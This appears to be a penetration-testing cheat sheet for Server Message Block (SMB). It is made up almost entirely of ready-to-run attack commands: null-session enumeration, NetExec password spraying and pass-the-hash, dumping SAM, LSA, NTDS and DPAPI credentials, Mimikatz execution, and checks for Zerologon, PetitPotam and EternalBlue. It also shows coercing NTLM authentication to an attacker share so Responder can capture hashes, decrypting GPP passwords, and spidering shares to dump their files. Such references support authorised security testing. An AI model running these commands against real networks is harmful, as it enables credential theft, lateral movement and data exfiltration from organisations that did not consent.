Pentesting SMB

SMB
SMB (Server Message Block) is the cornerstone of file and printer sharing in Windows environments. It usually runs on port 445, though older versions may use port 139. Because SMB is so deeply woven into many networks, it often goes unnoticed, making it a treasure trove for attackers looking to gather information or move laterally. Infamous exploits like EternalBlue demonstrate just how devastating an SMB vulnerability can be. When running a penetration test, examining SMB should be a priority.
Navigation
  • Discovery and Enumeration
  • Useful Tools and Techniques
  • Vulnerability Checks
  • Packet Capture for SMB Hashes
  • Recursively Download Files
  • GPP Passwords in SYSVOL
  • Crawl File Shares

Discovery and Enumeration

Scanning for SMB Services

The Nmap tool can be used to scan for SMB targets:

nmap -p 139,445 --open 10.1.1.1            #Check if SMB is running on a target IP
nmap -p 139,445 --open -iL targets.txt     #Scan multiple SMB servers from a file of targets
nmap -p 139,445 --open 10.1.1.0/24         #Scan a subnet for open SMB servers
nmap -p 139,445 -sV 10.1.1.1               #Identify the SMB details

nbtscan is a NetBIOS scanner that can be used to discover hostnames and MAC addresses:

nbtscan -r 10.1.1.0/24        #Scan a subnet
nbtscan -r -f ip_list.txt     #Scan a list of IPs

enum4linux is a tool that uses multiple techniques to gather information from Windows and Samba systems:

enum4linux -v -a 10.1.1.1                                #Run enum4linux with no credentials (Useful if SMB Null sessions are possible)
enum4linux -a -u <username> -p <password> 10.1.1.1       #Run authenticated enum4linux

nmblookup queries NetBIOS names and maps them to IP addresses:

nmblookup -A 10.11.1.5                                            #Scan a target

#Unique names (some common codes):
00: Workstation Service (workstation name)
03: Windows Messenger service
06: Remote Access Service
20: File Service (Host Record)
21: Remote Access Service client
1B: Domain Master Browser / Primary Domain Controller
1D: Master Browser

#Group names:
00: Workstation Service (workgroup/domain name)
1C: Domain Controllers for a domain
1E: Browser Service Elections

SMBMap is a tool that scans and enumerates shares, including permissions and deeper file share data:

smbmap -H 10.1.1.1
smbmap -u "guest" -p "" -H 1.1.1.1
smbmap -H 10.1.1.1 -d doamin.local -u <user> -p <password>

smbclient is a tool that can interactively connect to SMB shares (similar to an FTP client):

smbclient -L 10.1.1.1
smbclient -L doamin.local -W doamin.local -U <user>
smbclient -U "guest" //10.1.1.1/share_name
smbclient //10.1.1.1/tmp
smbclient //10.1.1.1/backup -W domain.local -U <user>

rpcclient enumerates domain users, groups, and more via RPC over SMB:

rpcclient -U "" -N 10.1.1.1                       #Attempt SMB null session connection
rpcclient -U "" -N 10.1.1.1 enumdomusers          #Attempt to enumerate domain users via SMB null session
rpcclient -U "DOMAIN\username%passwd" 10.1.1.1    #Authenticate with a domain user account
rpcclient -U "admin%password" 10.1.1.1            #Authenticate with administrator credentials
rpcclient -U "user%pass" -W WORKGROUP 10.1.1.1    #Specify authentication within a workgroup environment

Useful Tools and Techniques

To automate numerous SMB actions, including password spraying, share enumeration, executing modules (like Mimikatz), and more NetExec is an excellent tool. I have a comprehensive cheat sheet for NetExec here.

#Basic usage / listing
netexec smb -L
netexec smb <dc_ip> -u '' -p '' -M zerologon
netexec smb <dc_ip> -u '' -p '' -M petitpotam
netexec smb <dc_ip> -u 'user' -p 'pass' -M nopac
netexec smb <ip> -u 'user' -p 'pass' -M printnightmare
netexec smb <ip> -u 'user' -p 'pass' -M smbghost
netexec smb 10.1.1.0/24 -u Administrator -H [hash] --local-auth
netexec smb 10.1.1.0/24 -u Administrator -H [hash] --shares

#Using modules and enumerations
netexec smb 10.1.1.0/24 --shares
netexec smb 10.1.1.1 -u '' -p '' --pass-pol
netexec smb 10.1.1.1 -u '' -p '' --users
netexec smb 10.1.1.1 -u '' -p '' --groups
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --sessions
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --disks
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --loggedon-users
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --users
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --groups
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --local-group
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --pass-pol
netexec smb 10.1.1.0/24 -u user -p 'Password' --local-auth -M mimikatz
netexec smb 10.1.1.0/24 -u 'services' -p 'P@ssw0rd' -M slinky -o SERVER=10.255.9.87 NAME=Slinky_file

#Password Spraying
netexec smb 10.1.1.1 -u user1 user2 user3 -p Password1
netexec smb 10.1.1.1 -u user1 -p password1 password2 password3
netexec smb 10.1.1.1 -u /path/to/users.txt -p Password1 --continue-on-success.
netexec smb 10.1.1.1 -u Administrator -p /path/to/passwords.txt
netexec smb 10.1.1.1 -u user.txt -p password.txt 

#Obtaining Credentials
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --sam
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --lsa
netexec smb 10.1.1.1 -u 'user' -p 'pass' --ntds
netexec smb 10.1.1.1 -u 'user' -p 'pass' --dpapi
netexec smb 10.1.1.1 -u 'user' -p 'pass' --sccm

#Generating a list for relay attacks (SMB signing disabled)
sudo crackmapexec smb 10.1.1.0/24 --gen-relay-list targets.txt

Vulnerability Checks

Nmap provides multiple scripts for enumerating and checking known SMB vulnerabilities:

nmap --script smb-* -p 139,445 10.1.1.1
nmap --script smb-enum-* -p 139,445 10.1.1.1
nmap --script=smb-vuln* 10.1.1.1
nmap -iL smbtargets.txt --script=smb-vuln-* -p139,445 --script-args=unsafe=1 -oG smbvulns.txt

#If writable fileshares found => use netexec + relay attack (if SMB signing = false)
NeteExec has several modules to test for vulnerabilities:
nxc smb <target(s)> -u 'user' -p 'pass' -M dfscoerce                 #Module to check if the DC is vulnerable to DFSCocerc.
nxc smb <target(s)> -u 'user' -p 'pass' -M ms17-010                  #MS17-010 - EternalBlue
nxc smb <target(s)> -u 'user' -p 'pass' -M nopac                     #Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
nxc smb <target(s)> -u 'user' -p 'pass' -M petitpotam                #Module to check if the DC is vulnerable to PetitPotam.
nxc smb <target(s)> -u 'user' -p 'pass' -M printnightmare            #Check if host vulnerable to printnightmare
nxc smb <target(s)> -u 'user' -p 'pass' -M shadowcoerce              #Module to check if the target is vulnerable to ShadowCoerce.
nxc smb <target(s)> -u 'user' -p 'pass' -M spooler                   #Detect if print spooler is enabled or not
nxc smb <target(s)> -u 'user' -p 'pass' -M zerologon                 #Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472

Packet Capture for SMB Hashes

If you have command execution on a system, you can leverage netsh to capture SMB traffic and extract NTLM hashes:

netsh.exe trace start persistent=yes capture=yes tracefile=C:\Temp\saphash.d maxsize=4096

Then, from the target system, run any commands that direct output to a remote SMB share on your attacker machine (e.g., DIR \\attacker\share). This forces SMB authentication, letting you capture or relay or crack those hashes.

To capture the hashes you can use the Responder tool:

sudo responder -I eth0 -v -FDdP

Recursively Download Files

With SMB access, you can recursively download folders with smbclient:

smbclient -L //10.1.1.1
smbclient //10.1.1.1/share
smbclient //10.1.1.1/share$ -U 'domain\user'

#Download entire folders
smbclient //10.1.1.1/Share
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/local/dir'
smb: \> mget *

GPP Passwords in SYSVOL

Group Policy Preferences (GPP) can store passwords in SYSVOL. Metasploit has a scanner for it:

use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS 10.1.1.1
set SMBDomain MYDOMAIN
set SMBUser myuser
set SMBPass mypassword
exploit

Then decrypt any found passwords:

echo 'edBSHOwhZLTjt/QS3FrIcJ53mjWA98gw9gujOhJOdcqh+ZGMeYOsQbCtZ4xUjTLfCuPH8pG5aSZYdYw/NgLVmQ' \
  | base64 -d \
  | openssl enc -d -aes-256-cbc \
    -K 4f9606e8fcb66cc9fbw48310620ffee8f596e806cc067991209b09a433b76c1b \
    -iv 0000000000000000

Crawl File Shares

Windows File Search & Snaffler

Grepping Shares in Windows:

grep -ri --include=\*.ini --include=\*.txt --include=\*.xml \
  --include=\*.bat --include=\*.ps1 --include=\*.conf --include=\*.svc \
  --include=\*.ora --include=\*.config --include=\*.php --include=\*.sql pass \\10.1.1.1\inetpub$

Snaffler is a tool that automatically searches network shares for potentially interesting files (passwords, keys, etc.):

runas /netonly /user:[email protected] "powershell"
.\Snaffler.exe -o smb.log -s -d domain.local -r 250000 -j 150

Manspider

manspider is a great tool for crawling SMB shares for juicy information.

./manspider.sh 10.1.1.0/24 -f assword -d domain.local -u 'username' -p 'password' -n

NetExec

NetExec has an SMB spidering module for findings sensitive data in SMB shares:

nxc SMB 10.1.1.1 -u 'user' -p 'pass' --spider C\$ --pattern txt             #Spider the C drive for files with txt in the file name
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus                         #List all readable files
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True   #Dump all files from all readable shares on the target host